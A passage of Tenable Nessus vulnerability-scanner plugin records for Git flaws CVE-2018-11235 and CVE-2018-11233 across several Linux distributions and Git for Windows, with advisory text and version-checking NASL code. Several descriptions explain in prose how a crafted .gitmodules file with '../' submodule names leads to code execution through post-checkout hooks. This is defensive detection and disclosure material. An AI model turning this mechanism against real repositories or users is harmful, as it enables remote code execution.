copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "CentOS 7 : git (CESA-2018:1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-12-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:emacs-git", "p-cpe:/a:centos:centos:emacs-git-el", "p-cpe:/a:centos:centos:git", "p-cpe:/a:centos:centos:git-all", "p-cpe:/a:centos:centos:git-bzr", "p-cpe:/a:centos:centos:git-cvs", "p-cpe:/a:centos:centos:git-daemon", "p-cpe:/a:centos:centos:git-email", "p-cpe:/a:centos:centos:git-gui", "p-cpe:/a:centos:centos:git-hg", "p-cpe:/a:centos:centos:git-p4", "p-cpe:/a:centos:centos:git-svn", "p-cpe:/a:centos:centos:gitk", "p-cpe:/a:centos:centos:gitweb", "p-cpe:/a:centos:centos:perl-Git", "p-cpe:/a:centos:centos:perl-Git-SVN", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110663", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1957 and \n# CentOS Errata and Security Advisory 2018:1957 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110663);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/31\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"CentOS 7 : git (CESA-2018:1957)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2018-June/022924.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3090cd26\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:25", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : git (ALAS-2018-1035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-core", "p-cpe:/a:amazon:linux:git-core-doc", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-gnome-keyring", "p-cpe:/a:amazon:linux:git-gui", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitk", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2018-1035.NASL", "href": "https://www.tenable.com/plugins/nessus/110452", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1035.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110452);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"ALAS\", value:\"2018-1035\");\n\n script_name(english:\"Amazon Linux 2 : git (ALAS-2018-1035)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check\npathnames on NTFS can result in reading out-of-bounds\nmemory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution\ncan occur. With a crafted .gitmodules file, a malicious project can\nexecute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this\nfile, and then appended to $GIT_DIR/modules, leading to directory\ntraversal with '../' in a name. Finally, post-checkout hooks from a\nsubmodule are executed, bypassing the intended design in which hooks\nare not obtained from a remote server.(CVE-2018-11235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-all-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-core-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-core-doc-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-cvs-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-daemon-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-debuginfo-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-email-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-gnome-keyring-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-gui-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-p4-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-svn-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"gitk-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"gitweb-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"perl-Git-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"perl-Git-SVN-2.14.4-1.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-all / git-core / git-core-doc / git-cvs / git-daemon / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:57", "description": "The version of Git for Windows installed on the remote host is 2.13.x prior to 2.13.7, 2.14.x prior to 2.14.4, 2.15.x prior to 2.15.2, 2.16.x prior to 2.16.4 or 2.17.x prior to 2.17.1. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-01T00:00:00", "type": "nessus", "title": "Git for Windows 2.13.x < 2.13.7 / 2.14.x < 2.14.4 / 2.15.x < 2.15.2 / 2.16.x < 2.16.4 / 2.17.x < 2.17.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-11-04T00:00:00", "cpe": ["cpe:/a:git_for_windows_project:git_for_windows"], "id": "GIT_FOR_WINDOWS_2_17_1.NASL", "href": "https://www.tenable.com/plugins/nessus/110270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Git for Windows 2.13.x < 2.13.7 / 2.14.x < 2.14.4 / 2.15.x < 2.15.2 / 2.16.x < 2.16.4 / 2.17.x < 2.17.1 Remote Code Execution\");\n script_summary(english:\"Checks the version of git.exe.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\n by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Git for Windows installed on the remote host is 2.13.x\n prior to 2.13.7, 2.14.x prior to 2.14.4, 2.15.x prior to 2.15.2,\n 2.16.x prior to 2.16.4 or 2.17.x prior to 2.17.1. It is,\n therefore, affected by a remote code execution vulnerability.\");\n # https://marc.info/?l=git&m=152761328506724&w=2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8dff24\");\n # https://github.com/git-for-windows/git/releases/tag/v2.17.1.windows.2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f1267c9c\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.13.7.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f45ca93\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.14.4.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbe82e91\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.15.2.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff69b9fa\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.16.4.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c6c2dec\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.17.1.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d150bb79\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Git for Windows 2.13.7 / 2.14.4 / 2.15.2 / 2.16.4 / 2.17.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git_for_windows_project:git_for_windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"git_for_windows_installed.nbin\");\n script_require_keys(\"installed_sw/Git for Windows\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_name = \"Git for Windows\";\n\napp_info = vcf::get_app_info(app:app_name, win_local:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.13\", \"fixed_version\" : \"2.13.7\" },\n { \"min_version\" : \"2.14\", \"fixed_version\" : \"2.14.4\" },\n { \"min_version\" : \"2.15\", \"fixed_version\" : \"2.15.2\" },\n { \"min_version\" : \"2.16\", \"fixed_version\" : \"2.16.4\" },\n { \"min_version\" : \"2.17\", \"fixed_version\" : \"2.17.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:57", "description": "Upstream security fixes related to .gitmodules handling. From the [upstream announcement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct .c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of concept from which the test script was adapted goes to Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233). ```\n\nA preliminary patch to resolve an issue with zlib on aarch64 is also included (RHBZ#1582555).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : git (2018-75f7624a9f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:git", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-75F7624A9F.NASL", "href": "https://www.tenable.com/plugins/nessus/120535", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-75f7624a9f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120535);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-75f7624a9f\");\n\n script_name(english:\"Fedora 28 : git (2018-75f7624a9f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security fixes related to .gitmodules handling. From the\n[upstream\nannouncement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct\n.c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of\n concept from which the test script was adapted goes to\n Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233). ```\n\nA preliminary patch to resolve an issue with zlib on aarch64 is also\nincluded (RHBZ#1582555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-75f7624a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 